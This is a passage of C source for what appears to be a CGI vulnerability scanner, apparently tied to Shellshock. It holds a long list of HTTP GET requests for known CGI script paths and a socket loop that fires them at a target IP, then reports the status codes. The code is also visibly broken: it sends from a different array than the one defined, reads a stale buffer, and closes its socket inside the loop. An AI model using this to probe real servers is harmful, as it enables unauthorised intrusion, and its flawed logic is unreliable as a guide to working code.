/cgi-bin/upload.cgi HTTP/1.0\n\n"; bug[256] = "GET /cgi-bin/urlcount.cgi HTTP/1.0\n\n"; bug[257] = "GET /cgi-bin/viewcvs.cgi HTTP/1.0\n\n"; bug[258] = "GET /cgi-bin/viralator.cgi HTTP/1.0\n\n"; bug[259] = "GET /cgi-bin/virgil.cgi HTTP/1.0\n\n"; bug[260] = "GET /cgi-bin/vote.cgi HTTP/1.0\n\n"; bug[261] = "GET /cgi-bin/vpasswd.cgi HTTP/1.0\n\n"; bug[262] = "GET /cgi-bin/way-board.cgi HTTP/1.0\n\n"; bug[263] = "GET /cgi-bin/way-board/way-board.cgi HTTP/1.0\n\n"; bug[264] = "GET /cgi-bin/webbbs.cgi HTTP/1.0\n\n"; bug[265] = "GET /cgi-bin/webcart/webcart.cgi HTTP/1.0\n\n"; bug[266] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n"; bug[267] = "GET /cgi-bin/webif.cgi HTTP/1.0\n\n"; bug[268] = "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0\n\n"; bug[269] = "GET /cgi-bin/webmap.cgi HTTP/1.0\n\n"; bug[270] = "GET /cgi-bin/webspirs.cgi HTTP/1.0\n\n"; bug[271] = "GET /cgi-bin/whois.cgi HTTP/1.0\n\n"; bug[272] = "GET /cgi-bin/whois/whois.cgi HTTP/1.0\n\n"; bug[273] = "GET /cgi-bin/whois_raw.cgi HTTP/1.0\n\n"; bug[274] = "GET /cgi-bin/wrap HTTP/1.0\n\n"; bug[275] = "GET /cgi-bin/wrap.cgi HTTP/1.0\n\n"; bug[276] = "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0\n\n"; bug[277] = "GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0\n\n"; bug[278] = "GET /cgi-bin/zml.cgi HTTP/1.0\n\n"; bug[279] = "GET /cgi-sys/addalink.cgi HTTP/1.0\n\n"; bug[280] = "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0\n\n"; bug[281] = "GET /cgi-sys/domainredirect.cgi HTTP/1.0\n\n"; bug[282] = "GET /cgi-sys/entropybanner.cgi HTTP/1.0\n\n"; bug[283] = "GET /cgi-sys/entropysearch.cgi HTTP/1.0\n\n"; bug[284] = "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0\n\n"; bug[285] = "GET /cgi-sys/helpdesk.cgi HTTP/1.0\n\n"; bug[286] = "GET /cgi-sys/mchat.cgi HTTP/1.0\n\n"; bug[287] = "GET /cgi-sys/randhtml.cgi HTTP/1.0\n\n"; bug[288] = "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0\n\n"; bug[289] = "GET /cgi-sys/realsignup.cgi HTTP/1.0\n\n"; bug[290] = "GET /cgi-sys/signup.cgi HTTP/1.0\n\n"; bug[291] = "GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0\n\n"; bug[292] = "GET /connector.cgi HTTP/1.0\n\n"; bug[293] = "GET /cp/rac/nsManager.cgi HTTP/1.0\n\n"; bug[294] = "GET /create_release.sh HTTP/1.0\n\n"; bug[295] = "GET /CSNews.cgi HTTP/1.0\n\n"; bug[296] = "GET /csPassword.cgi HTTP/1.0\n\n"; bug[297] = "GET /dcadmin.cgi HTTP/1.0\n\n"; bug[298] = "GET /dcboard.cgi HTTP/1.0\n\n"; bug[299] = "GET /dcforum.cgi HTTP/1.0\n\n"; bug[300] = "GET /dcforum/dcforum.cgi HTTP/1.0\n\n"; bug[301] = "GET /debug.cgi HTTP/1.0\n\n"; bug[302] = "GET /details.cgi HTTP/1.0\n\n"; bug[303] = "GET /edittag/edittag.cgi HTTP/1.0\n\n"; bug[304] = "GET /emumail.cgi HTTP/1.0\n\n"; bug[305] = "GET /enter_bug.cgi HTTP/1.0\n\n"; bug[306] = "GET /ez2000/ezadmin.cgi HTTP/1.0\n\n"; bug[307] = "GET /ez2000/ezboard.cgi HTTP/1.0\n\n"; bug[308] = "GET /ez2000/ezman.cgi HTTP/1.0\n\n"; bug[309] = "GET /fcgi-bin/echo HTTP/1.0\n\n"; bug[310] = "GET /fcgi-bin/echo2 HTTP/1.0\n\n"; bug[311] = "GET /Gozila.cgi HTTP/1.0\n\n"; bug[312] = "GET /hitmatic/analyse.cgi HTTP/1.0\n\n"; bug[313] = "GET /html/cgi-bin/cgicso HTTP/1.0\n\n"; bug[314] = "GET /index.cgi HTTP/1.0\n\n"; bug[315] = "GET /info.cgi HTTP/1.0\n\n"; bug[316] = "GET /infosrch.cgi HTTP/1.0\n\n"; bug[317] = "GET /login.cgi HTTP/1.0\n\n"; bug[318] = "GET /mailview.cgi HTTP/1.0\n\n"; bug[319] = "GET /main.cgi HTTP/1.0\n\n"; bug[320] = "GET /megabook/admin.cgi HTTP/1.0\n\n"; bug[321] = "GET /ministats/admin.cgi HTTP/1.0\n\n"; bug[322] = "GET /mods/apage/apage.cgi HTTP/1.0\n\n"; bug[323] = "GET /musicqueue.cgi HTTP/1.0\n\n"; bug[324] = "GET /ncbook.cgi HTTP/1.0\n\n"; bug[325] = "GET /newpro.cgi HTTP/1.0\n\n"; bug[326] = "GET /newsletter.sh HTTP/1.0\n\n"; bug[327] = "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0\n\n"; bug[328] = "GET /page.cgi HTTP/1.0\n\n"; bug[329] = "GET /parse_xml.cgi HTTP/1.0\n\n"; bug[330] = "GET /photo/manage.cgi HTTP/1.0\n\n"; bug[331] = "GET /photodata/manage.cgi HTTP/1.0\n\n"; bug[332] = "GET /print.cgi HTTP/1.0\n\n"; bug[333] = "GET /process_bug.cgi HTTP/1.0\n\n"; bug[334] = "GET /pub/english.cgi HTTP/1.0\n\n"; bug[335] = "GET /quikmail/nph-emumail.cgi HTTP/1.0\n\n"; bug[336] = "GET /quikstore.cgi HTTP/1.0\n\n"; bug[337] = "GET /reviews/newpro.cgi HTTP/1.0\n\n"; bug[338] = "GET /ROADS/cgi-bin/search.pl HTTP/1.0\n\n"; bug[339] = "GET /sample01.cgi HTTP/1.0\n\n"; bug[340] = "GET /sample02.cgi HTTP/1.0\n\n"; bug[341] = "GET /sample03.cgi HTTP/1.0\n\n"; bug[342] = "GET /sample04.cgi HTTP/1.0\n\n"; bug[343] = "GET /sampleposteddata.cgi HTTP/1.0\n\n"; bug[344] = "GET /scancfg.cgi HTTP/1.0\n\n"; bug[345] = "GET /servers/link.cgi HTTP/1.0\n\n"; bug[346] = "GET /setpasswd.cgi HTTP/1.0\n\n"; bug[347] = "GET /SetSecurity.shm HTTP/1.0\n\n"; bug[348] = "GET /shop/member_html.cgi HTTP/1.0\n\n"; bug[349] = "GET /shop/normal_html.cgi HTTP/1.0\n\n"; bug[350] = "GET /site_searcher.cgi HTTP/1.0\n\n"; bug[351] = "GET /siteUserMod.cgi HTTP/1.0\n\n"; bug[352] = "GET /submit.cgi HTTP/1.0\n\n"; bug[353] = "GET /technote/print.cgi HTTP/1.0\n\n"; bug[354] = "GET /template.cgi HTTP/1.0\n\n"; bug[355] = "GET /test.cgi HTTP/1.0\n\n"; bug[356] = "GET /upload.cgi HTTP/1.0\n\n"; bug[357] = "GET /userreg.cgi HTTP/1.0\n\n"; bug[358] = "GET /users/scripts/submit.cgi HTTP/1.0\n\n"; bug[359] = "GET /Web_Store/web_store.cgi HTTP/1.0\n\n"; bug[360] = "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0\n\n"; bug[361] = "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0\n\n"; bug[362] = "GET /webtools/bonsai/cvslog.cgi HTTP/1.0\n\n"; bug[363] = "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0\n\n"; bug[364] = "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0\n\n"; bug[365] = "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0\n\n"; bug[366] = "GET /wwwadmin.cgi HTTP/1.0\n\n"; bug[367] = "GET /wwwboard.cgi HTTP/1.0\n\n"; bug[368] = "GET /cgi-sys/entropysearch.cgi HTTP/1.0\n\n"; bug[369] = "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0\n\n"; bug[370] = "GET /wwwboard/wwwsboard.cgi HTTP/1.0\n\n"; int errex; int numbytes = 0 , opt; sock = socket(AF_INET,SOCK_STREAM,0); remote.sin_port = htons(PORT); remote.sin_addr.s_addr = inet_addr(IP); remote.sin_family = AF_INET; memset(remote.sin_zero,0,sizeof(remote.sin_zero)); fflush(stdout); if (sock == -1) { perror("socket creation error"); return; } FD_ZERO( &wset ); FD_SET( sock , &wset ); FD_ZERO( &rset ); FD_SET( sock , &rset ); tv.tv_sec = TIMEOUT; tv.tv_usec = 0; if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) { perror("fcntl error"); return; } errex = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr)); if( errno != EINPROGRESS && errno != EISCONN ) { perror("connection error"); return; } opt = select(sock+1,NULL,&wset,NULL,&tv); if( fcntl( sock , F_SETFL , 0 ) == -1 ) { perror("fcntl error"); return; } if( opt == -1 ) { perror("select error"); return; } if( !opt ) { printf("time out.\n"); return; } numbytes = recv(sock,server,sizeof(server),0); if( numbytes == -1 ) { perror("recv"); return; } server[numbytes-1]='\0'; if(strlen(server) == 0) { printf("connection closed\n"); return; } while(i<370) { i++; printf("\n\n\n %d-th session... \n", i); char request_msg[512]; snprintf(request_msg, sizeof(request_msg), buff[i], useragent); printf("requested message is below \n %s\n", request_msg); send(sock, request_msg, strlen(request_msg), 0); char buffers[1500]; // fcntl( sock , F_SETFL , 0 ); int cnt = recv(sock, buffers, sizeof(buffers), 0); buffers[cnt-1]='\0'; if(strlen(server) == 0) { printf("[+] AIS Shellshock Error\n"); printf("[+] Connection closed.\n"); return; } printf("first part of resonse message is below \n %s\n",buffers); if ( strstr(buffers, "404")) printf("RFC 2616, 10.4.5 - HTTP Error [404] False Positive. The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent. The 410 Gone status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.\n\a"); if ( strstr(buffers, "202")) printf("RFC 2616, 10.2.3 - HTTP Okay [202] Detected Common Gateway Interface Script: %s .\n\a", bug[i]); if ( strstr(buffers, "401")) printf("RFC 2616, 10.4.2 - HTTP Unauthorized [401] Unauthorized Access: The request requires user authentication. The response MUST include a WWW-Authenticate header field - section 14.47 containing a challenge applicable to the requested resource. The client MAY repeat the request with a suitable Authorization header field section 14.8. If the request already included Authorization credentials, then the 401 response indicates that authorization has been refused for those credentials. If the 401 response contains the same challenge as the prior response, and the user agent has already attempted authentication at least once, then the user SHOULD be presented the entity that was given in the response, since that entity might include relevant diagnostic information. HTTP access authentication is explained in HTTP Authentication: Basic and Digest Access Authentication.\n\a"); if ( strstr(buffers, "500")) printf("RFC 2616, 10.5.1 - HTTP Internal Server Error [500] Internal Server Error - Couldn't recognise the request or server error occured. The server encountered an unexpected condition which prevented it from fulfilling the request.\n\a"); if ( strstr(buffers, "303")) printf("RFC 2616, 10.3.4 - HTTP See Other [303] Possible Redirect - The requested resource is temporary under a different URL: The response to the request can be found under a different URI and SHOULD be retrieved using a GET method on that resource. This method exists primarily to allow the output of a POST-activated script to redirect the user agent to a selected resource. The new URI is not a substitute reference for the originally requested resource. The 303 response MUST NOT be cached, but the response to the second *redirected* request might be cacheable.\n\a"); if ( strstr(buffers, "307")) printf("RFC 2616, 10.3.8 - HTTP Temporary Redirect [307] Possible Redirect - The requested resource resides temporarily under a different URI. Since the redirection MAY be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field. The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URIs , since many pre-HTTP/1.1 user agents do not understand the 307 status. Therefore, the note SHOULD contain the information necessary for a user to repeat the original request on the new URI.\n\a"); if ( strstr(buffers, "403")) printf("RFC 2616, 10.4.4 - HTTP Forbidden [403] The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 - Not Found can be used instead.\n\a"); if ( strstr(buffers, "407")) printf("RFC 2616, 10.4.8 - HTTP Proxy Authentication Required [407] - This code is similar to 401 Unauthorized, but indicates that the client must first authenticate itself with the proxy. The proxy MUST return a Proxy-Authenticate header field section 14.33 containing a challenge applicable to the proxy for the requested resource. The client MAY repeat the request with a suitable Proxy-Authorization header field.\n\a"); if ( strstr(buffers, "408")) printf("RFC 2616, 10.4.9 - HTTP Request Time out [408] - The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time.\n\a"); if ( strstr(buffers, "503")) printf("RFC 2616, 10.5.4 - HTTP Service Unavailable [503] - Server Side Refuse. The server is currently unable to handle the request due to a temporary overloading or maintenance of the server. The implication is that this is a temporary condition which will be alleviated after some delay. If known, the length of the delay MAY be indicated in a Retry-After header. If no Retry-After is given, the client SHOULD handle the response as it would for a 500 response.\n\a"); close(sock); } fprintf(stdout, "Scan for IP -> %s has now been completed. \n\a", inet_ntoa(remote.sin_addr)); exit(1); }